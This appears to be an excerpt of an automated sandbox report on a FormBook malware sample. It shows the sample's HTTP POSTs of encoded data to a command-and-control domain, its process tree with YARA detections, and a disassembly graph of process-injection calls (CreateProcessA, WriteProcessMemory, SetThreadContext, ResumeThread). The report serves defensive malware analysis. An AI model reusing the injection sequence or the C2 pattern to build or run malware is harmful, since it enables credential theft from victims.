                                                  Data Ascii: osition: absolute; top: calc(.3em + var(--padding)); transform: rotate(-45deg); width: .5em; } input[type=checkbox]:checked ~ .checkbox::before { opacity: 1; } #recurrent-error-message { background: #ededed; border-radius: 4px; margin-bottom:
                                                  Jul 1, 2024 19:27:01.953921080 CEST547INData Raw: 74 68 65 20 74 6f 70 20 63 6f 6e 74 65 6e 74 20 69 6e 20 69 74 73 20 6f 77 6e 20 73 63 72 6f 6c 6c 61 62 6c 65 20 61 72 65 61 2e 20 2a 2f 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 32 30 70 78 29 20 7b 20 2e 6e 61 76 2d 77 72
                                                  Data Ascii: the top content in its own scrollable area. */ @media (max-width: 420px) { .nav-wrapper .secondary-button { border: 0; margin: 16px 0 0; margin-inline-end: 0; padding-bottom: 16px; padding-top: 16px; } } /* Fixed nav. */ @media (min-width: 240
                                                  Jul 1, 2024 19:27:01.953931093 CEST1236INData Raw: 32 30 30 30 0d 0a 32 34 70 78 3b 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 34 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 72 69 67 68 74 3a 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7a 2d
                                                  Data Ascii: 200024px; padding-inline-start: 24px; position: fixed; right: 0; width: 100%; z-index: 2; } .interstitial-wrapper { max-width: 736px; } #details, #main-content { padding-bottom: 40px; } #details { padding-top: 5.5vh; } button.small-link { co
                                                  Jul 1, 2024 19:27:01.953943968 CEST1236INData Raw: 29 3b 20 7d 20 2e 73 6d 61 6c 6c 2d 6c 69 6e 6b 20 7b 20 62 6f 72 64 65 72 3a 20 30 3b 20 7d 20 2e 73 75 67 67 65 73 74 65 64 2d 6c 65 66 74 20 3e 20 23 63 6f 6e 74 72 6f 6c 2d 62 75 74 74 6f 6e 73 2c 20 2e 73 75 67 67 65 73 74 65 64 2d 72 69 67
                                                  Data Ascii: ); } .small-link { border: 0; } .suggested-left > #control-buttons, .suggested-right > #control-buttons { float: none; margin: 0; } } @media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) { .interstitial-wrapper { margin-to
                                                  Jul 1, 2024 19:27:01.960066080 CEST1236INData Raw: 72 61 70 70 65 72 20 7b 20 66 6c 65 78 3a 20 30 20 31 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 70 78 3b 20 6f 72 64 65 72 3a 20 31 3b 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 20 70 61 64 64 69 6e 67
                                                  Data Ascii: rapper { flex: 0 1 auto; margin-top: 8px; order: 1; padding-inline-end: 0; padding-inline-start: 0; position: relative; width: 100%; } button, .nav-wrapper .secondary-button { padding: 16px 24px; } button.small-link { color: var(--google-blue-


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  42192.168.2.76449784.32.84.32806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:27:07.334908962 CEST737OUTPOST /ynea/ HTTP/1.1
                                                  Host: www.xn--gotopia-bya.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.xn--gotopia-bya.com
                                                  Referer: http://www.xn--gotopia-bya.com/ynea/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 4b 46 2b 44 30 55 63 48 53 4d 53 32 48 74 70 45 45 6f 56 62 63 46 64 4a 59 38 30 49 45 52 63 4f 74 34 41 44 52 74 59 44 50 4d 33 55 2b 56 70 65 73 6d 4c 44 6d 79 42 6e 4b 47 47 58 31 4a 77 66 42 6d 64 45 46 74 78 71 42 31 54 53 74 64 59 66 66 53 54 72 47 6f 56 5a 5a 46 32 74 4a 71 4f 55 48 67 50 4c 71 6f 34 4d 4e 37 63 4b 59 58 6e 4c 56 76 56 43 38 46 4a 45 47 79 50 56 71 64 67 37 32 46 33 61 46 64 49 73 6c 4c 76 47 52 38 31 58 69 74 70 6c 44 2f 56 53 73 2f 56 30 6c 6a 44 73 64 74 54 50 4e 2f 77 52 4c 4c 51 48 79 46 50 49 64 78 52 37 67 38 45 75 6a 44 31 46 62 4c 6c 76 6f 67 34 43 56 30 79 65 4e 53 54 4b 33 4f 68 44 53 77 3d 3d
                                                  Data Ascii: FTP84=KF+D0UcHSMS2HtpEEoVbcFdJY80IERcOt4ADRtYDPM3U+VpesmLDmyBnKGGX1JwfBmdEFtxqB1TStdYffSTrGoVZZF2tJqOUHgPLqo4MN7cKYXnLVvVC8FJEGyPVqdg72F3aFdIslLvGR81XitplD/VSs/V0ljDsdtTPN/wRLLQHyFPIdxR7g8EujD1FbLlvog4CV0yeNSTK3OhDSw==


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.76449884.32.84.3280
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:27:11.695501089 CEST757OUTPOST /ynea/ HTTP/1.1
                                                  Host: www.xn--gotopia-bya.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.xn--gotopia-bya.com
                                                  Referer: http://www.xn--gotopia-bya.com/ynea/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 4b 46 2b 44 30 55 63 48 53 4d 53 32 48 4e 5a 45 42 49 70 62 65 6c 64 57 47 73 30 49 54 42 63 4b 74 34 4d 44 52 73 4e 47 4d 2b 54 55 2b 78 74 65 76 6b 6a 44 6e 79 42 6e 43 6d 47 57 78 4a 77 71 42 6d 42 36 46 6f 4a 71 42 31 76 53 74 64 49 66 66 68 37 30 45 34 56 68 43 31 32 6a 45 4b 4f 55 48 67 50 4c 71 6f 38 6d 4e 37 45 4b 59 6e 58 4c 55 4f 56 42 2f 46 4a 46 4f 53 50 56 75 64 67 2f 32 46 33 38 46 66 39 48 6c 4e 6a 47 52 35 78 58 6a 2f 4e 71 5a 76 55 5a 78 76 55 77 6b 68 79 5a 54 39 57 30 48 73 77 71 4e 61 42 6a 36 54 53 71 48 54 64 58 2b 74 38 56 6e 42 52 7a 4d 74 34 61 71 68 38 61 59 57 47 2f 53 6c 32 67 36 63 41 48 45 41 49 34 4c 55 71 6a 68 39 48 34 42 32 4a 49 36 36 48 46 42 72 30 3d
                                                  Data Ascii: FTP84=KF+D0UcHSMS2HNZEBIpbeldWGs0ITBcKt4MDRsNGM+TU+xtevkjDnyBnCmGWxJwqBmB6FoJqB1vStdIffh70E4VhC12jEKOUHgPLqo8mN7EKYnXLUOVB/FJFOSPVudg/2F38Ff9HlNjGR5xXj/NqZvUZxvUwkhyZT9W0HswqNaBj6TSqHTdX+t8VnBRzMt4aqh8aYWG/Sl2g6cAHEAI4LUqjh9H4B2JI66HFBr0=


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:13:23:02
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
                                                  Imagebase:0x340000
                                                  File size:686'080 bytes
                                                  MD5 hash:677B2D2D3A54E0C1D8E416B276093FB3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:13:23:03
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
                                                  Imagebase:0x790000
                                                  File size:686'080 bytes
                                                  MD5 hash:677B2D2D3A54E0C1D8E416B276093FB3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:13:23:15
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe"
                                                  Imagebase:0x550000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:14
                                                  Start time:13:23:16
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\SysWOW64\chkntfs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                  Imagebase:0x940000
                                                  File size:19'968 bytes
                                                  MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:16
                                                  Start time:15:04:45
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe"
                                                  Imagebase:0x550000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:18
                                                  Start time:15:04:57
                                                  Start date:01/07/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff722870000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:15:07:23
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
                                                  Imagebase:0xd40000
                                                  File size:698'880 bytes
                                                  MD5 hash:A000A790579BE8EDD044A668469EA33E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:15:07:24
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
                                                  Imagebase:0xb30000
                                                  File size:698'880 bytes
                                                  MD5 hash:A000A790579BE8EDD044A668469EA33E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.8%
                                                    Total number of Nodes:164
                                                    Total number of Limit Nodes:10
                                                    execution_graph 17477 dbe258 DuplicateHandle 17478 dbe2ee 17477->17478 17479 dbbd58 17482 dbbe50 17479->17482 17480 dbbd67 17483 dbbe61 17482->17483 17485 dbbe6c 17482->17485 17486 dbb824 17483->17486 17485->17480 17488 dbc040 GetModuleHandleW 17486->17488 17489 dbc0b5 17488->17489 17489->17485 17503 dbc2c8 17504 dbc30a 17503->17504 17505 dbc310 LoadLibraryExW 17503->17505 17504->17505 17506 dbc341 17505->17506 17507 dbdc08 17508 dbdc4e GetCurrentProcess 17507->17508 17510 dbdc99 17508->17510 17511 dbdca0 GetCurrentThread 17508->17511 17510->17511 17512 dbdcdd GetCurrentProcess 17511->17512 17514 dbdcd6 17511->17514 17513 dbdd13 GetCurrentThreadId 17512->17513 17516 dbdd6c 17513->17516 17514->17512 17517 26e179b 17522 26e1f60 17517->17522 17537 26e1fc6 17517->17537 17553 26e1f51 17517->17553 17518 26e17aa 17523 26e1f7a 17522->17523 17528 26e1f82 17523->17528 17568 26e2510 17523->17568 17572 26e28d0 17523->17572 17577 26e2935 17523->17577 17582 26e2496 17523->17582 17587 26e2698 17523->17587 17592 26e24fc 17523->17592 17597 26e2621 17523->17597 17602 26e2823 17523->17602 17607 26e28cb 17523->17607 17612 26e242f 17523->17612 17616 26e27ef 17523->17616 17621 26e2b8e 17523->17621 17528->17518 17538 26e1f54 17537->17538 17540 26e1fc9 17537->17540 17539 26e1f82 17538->17539 17541 26e2b8e 2 API calls 17538->17541 17542 26e27ef 2 API calls 17538->17542 17543 26e242f 2 API calls 17538->17543 17544 26e28cb 2 API calls 17538->17544 17545 26e2823 2 API calls 17538->17545 17546 26e2621 2 API calls 17538->17546 17547 26e24fc 2 API calls 17538->17547 17548 26e2698 2 API calls 17538->17548 17549 26e2496 2 API calls 17538->17549 17550 26e2935 2 API calls 17538->17550 17551 26e28d0 2 API calls 17538->17551 17552 26e2510 2 API calls 17538->17552 17539->17518 17540->17518 17541->17539 17542->17539 17543->17539 17544->17539 17545->17539 17546->17539 17547->17539 17548->17539 17549->17539 17550->17539 17551->17539 17552->17539 17554 26e1f7a 17553->17554 17555 26e2b8e 2 API calls 17554->17555 17556 26e27ef 2 API calls 17554->17556 17557 26e242f 2 API calls 17554->17557 17558 26e28cb 2 API calls 17554->17558 17559 26e1f82 17554->17559 17560 26e2823 2 API calls 17554->17560 17561 26e2621 2 API calls 17554->17561 17562 26e24fc 2 API calls 17554->17562 17563 26e2698 2 API calls 17554->17563 17564 26e2496 2 API calls 17554->17564 17565 26e2935 2 API calls 17554->17565 17566 26e28d0 2 API calls 17554->17566 17567 26e2510 2 API calls 17554->17567 17555->17559 17556->17559 17557->17559 17558->17559 17559->17518 17560->17559 17561->17559 17562->17559 17563->17559 17564->17559 17565->17559 17566->17559 17567->17559 17626 26e0af8 17568->17626 17630 26e0b00 17568->17630 17569 26e2538 17569->17528 17573 26e248a 17572->17573 17574 26e2ae7 17573->17574 17575 26e0af8 WriteProcessMemory 17573->17575 17576 26e0b00 WriteProcessMemory 17573->17576 17574->17528 17575->17573 17576->17573 17578 26e2a2f 17577->17578 17634 26e0968 17578->17634 17638 26e0961 17578->17638 17579 26e2a4a 17579->17528 17584 26e248a 17582->17584 17583 26e2ae7 17583->17528 17584->17582 17584->17583 17585 26e0af8 WriteProcessMemory 17584->17585 17586 26e0b00 WriteProcessMemory 17584->17586 17585->17584 17586->17584 17588 26e26b2 17587->17588 17589 26e256a 17588->17589 17642 26e08b8 17588->17642 17646 26e08b1 17588->17646 17589->17528 17593 26e27a1 17592->17593 17595 26e0968 Wow64SetThreadContext 17593->17595 17596 26e0961 Wow64SetThreadContext 17593->17596 17594 26e27bc 17594->17528 17595->17594 17596->17594 17598 26e2b95 17597->17598 17650 26e0be8 17598->17650 17654 26e0bf0 17598->17654 17599 26e2bb7 17603 26e284c 17602->17603 17604 26e256a 17603->17604 17605 26e08b8 ResumeThread 17603->17605 17606 26e08b1 ResumeThread 17603->17606 17604->17528 17605->17603 17606->17603 17608 26e27ee 17607->17608 17610 26e0af8 WriteProcessMemory 17608->17610 17611 26e0b00 WriteProcessMemory 17608->17611 17609 26e2c75 17610->17609 17611->17609 17658 26e117c 17612->17658 17662 26e1188 17612->17662 17617 26e27ff 17616->17617 17619 26e0af8 WriteProcessMemory 17617->17619 17620 26e0b00 WriteProcessMemory 17617->17620 17618 26e2c75 17619->17618 17620->17618 17622 26e2b94 17621->17622 17623 26e2bb7 17622->17623 17624 26e0be8 ReadProcessMemory 17622->17624 17625 26e0bf0 ReadProcessMemory 17622->17625 17624->17623 17625->17623 17627 26e0b48 WriteProcessMemory 17626->17627 17629 26e0b9f 17627->17629 17629->17569 17631 26e0b48 WriteProcessMemory 17630->17631 17633 26e0b9f 17631->17633 17633->17569 17635 26e09ad Wow64SetThreadContext 17634->17635 17637 26e09f5 17635->17637 17637->17579 17639 26e09ad Wow64SetThreadContext 17638->17639 17641 26e09f5 17639->17641 17641->17579 17643 26e08f8 ResumeThread 17642->17643 17645 26e0929 17643->17645 17645->17588 17647 26e08f8 ResumeThread 17646->17647 17649 26e0929 17647->17649 17649->17588 17651 26e0bf0 ReadProcessMemory 17650->17651 17653 26e0c7f 17651->17653 17653->17599 17655 26e0c3b ReadProcessMemory 17654->17655 17657 26e0c7f 17655->17657 17657->17599 17659 26e1211 CreateProcessA 17658->17659 17661 26e13d3 17659->17661 17663 26e1211 CreateProcessA 17662->17663 17665 26e13d3 17663->17665 17490 26e4988 FindCloseChangeNotification 17491 26e49ef 17490->17491 17666 26e32f8 17667 26e3483 17666->17667 17668 26e331e 17666->17668 17668->17667 17669 26e0d9c PostMessageW 17668->17669 17669->17668 17670 db2180 17671 db218a 17670->17671 17673 db2280 17670->17673 17674 db22a5 17673->17674 17678 db2390 17674->17678 17682 db2380 17674->17682 17679 db23b7 17678->17679 17680 db2494 17679->17680 17686 db1fb8 17679->17686 17683 db23b7 17682->17683 17684 db2494 17683->17684 17685 db1fb8 CreateActCtxA 17683->17685 17684->17684 17685->17684 17687 db3420 CreateActCtxA 17686->17687 17689 db34e3 17687->17689 17689->17680 17492 26e0a40 17493 26e0a80 VirtualAllocEx 17492->17493 17495 26e0abd 17493->17495 17496 26e3a00 17497 26e3a21 17496->17497 17499 26e3a34 17496->17499 17500 26e0d9c 17497->17500 17499->17499 17501 26e3578 PostMessageW 17500->17501 17502 26e35e4 17501->17502 17502->17499

                                                    Executed Functions

                                                    Function 026E4078 Relevance: .6, Instructions: 614COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7795d02060264b3d0d8be1140d5e58fa18842d5440daa15a8b22cf4c03d9de0e
                                                    • Instruction ID: 1f62b94bc04a868359ec768a32126a10dab97a7509f135e433e583757229026c
                                                    • Opcode Fuzzy Hash: 7795d02060264b3d0d8be1140d5e58fa18842d5440daa15a8b22cf4c03d9de0e
                                                    • Instruction Fuzzy Hash: E7326870B022049FDB19DB79C550BAEB7F6EF89704F2444A9E5069B3A1CF35E901CB61
                                                    Function 026E2698 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efa1a8527334f2f7d91cf63a5a1fdfbec4536cf3b9da185b72e2a00d9f21fcae
                                                    • Instruction ID: 0ca865d1334ba467e0f13a12b54d11971059d0c9b9c6619840fc4ea4bf963a47
                                                    • Opcode Fuzzy Hash: efa1a8527334f2f7d91cf63a5a1fdfbec4536cf3b9da185b72e2a00d9f21fcae
                                                    • Instruction Fuzzy Hash: 9F21DB3980A214CFDF28CF55D964BE8B7BDEB49315F14A1DA880EA7291C7359A86CF10
                                                    Function 00DBDC08 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 305 dbdc08-dbdc97 GetCurrentProcess 309 dbdc99-dbdc9f 305->309 310 dbdca0-dbdcd4 GetCurrentThread 305->310 309->310 311 dbdcdd-dbdd11 GetCurrentProcess 310->311 312 dbdcd6-dbdcdc 310->312 314 dbdd1a-dbdd32 311->314 315 dbdd13-dbdd19 311->315 312->311 318 dbdd3b-dbdd6a GetCurrentThreadId 314->318 315->314 319 dbdd6c-dbdd72 318->319 320 dbdd73-dbddd5 318->320 319->320
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00DBDC86
                                                    • GetCurrentThread.KERNEL32 ref: 00DBDCC3
                                                    • GetCurrentProcess.KERNEL32 ref: 00DBDD00
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DBDD59
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 96c836cebc4e5773d3b21b6dcb69afc60fdd02a3364f4bbfdc12831aa4b2df10
                                                    • Instruction ID: 4b22dc96a1f59a18ddda7c550036b5199377b28b9038e807201079367aec9bbb
                                                    • Opcode Fuzzy Hash: 96c836cebc4e5773d3b21b6dcb69afc60fdd02a3364f4bbfdc12831aa4b2df10
                                                    • Instruction Fuzzy Hash: 645149B0900709CFEB14DFAAD5487DEBBF2EF48314F248059E019A7360D7B5A945CB66
                                                    Function 026E117C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 420 26e117c-26e121d 422 26e121f-26e1229 420->422 423 26e1256-26e1276 420->423 422->423 424 26e122b-26e122d 422->424 428 26e12af-26e12de 423->428 429 26e1278-26e1282 423->429 426 26e122f-26e1239 424->426 427 26e1250-26e1253 424->427 430 26e123d-26e124c 426->430 431 26e123b 426->431 427->423 439 26e1317-26e13d1 CreateProcessA 428->439 440 26e12e0-26e12ea 428->440 429->428 432 26e1284-26e1286 429->432 430->430 433 26e124e 430->433 431->430 434 26e1288-26e1292 432->434 435 26e12a9-26e12ac 432->435 433->427 437 26e1296-26e12a5 434->437 438 26e1294 434->438 435->428 437->437 441 26e12a7 437->441 438->437 451 26e13da-26e1460 439->451 452 26e13d3-26e13d9 439->452 440->439 442 26e12ec-26e12ee 440->442 441->435 444 26e12f0-26e12fa 442->444 445 26e1311-26e1314 442->445 446 26e12fe-26e130d 444->446 447 26e12fc 444->447 445->439 446->446 448 26e130f 446->448 447->446 448->445 462 26e1462-26e1466 451->462 463 26e1470-26e1474 451->463 452->451 462->463 466 26e1468 462->466 464 26e1476-26e147a 463->464 465 26e1484-26e1488 463->465 464->465 467 26e147c 464->467 468 26e148a-26e148e 465->468 469 26e1498-26e149c 465->469 466->463 467->465 468->469 470 26e1490 468->470 471 26e14ae-26e14b5 469->471 472 26e149e-26e14a4 469->472 470->469 473 26e14cc 471->473 474 26e14b7-26e14c6 471->474 472->471 475 26e14cd 473->475 474->473 475->475
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 026E13BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d4742e6c9bb690f1b16f88c329c9fc783abf7ccc24914078775ff17795a3d2af
                                                    • Instruction ID: fb56c59ba922a7dffcff55cba3ae34699c74019202512fd73a78433a83e5ee5a
                                                    • Opcode Fuzzy Hash: d4742e6c9bb690f1b16f88c329c9fc783abf7ccc24914078775ff17795a3d2af
                                                    • Instruction Fuzzy Hash: EDA13A71D01219CFEF24CF68C881BEEBBB2AF49314F1481A9E819A7240DB759985DF91
                                                    Function 026E1188 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
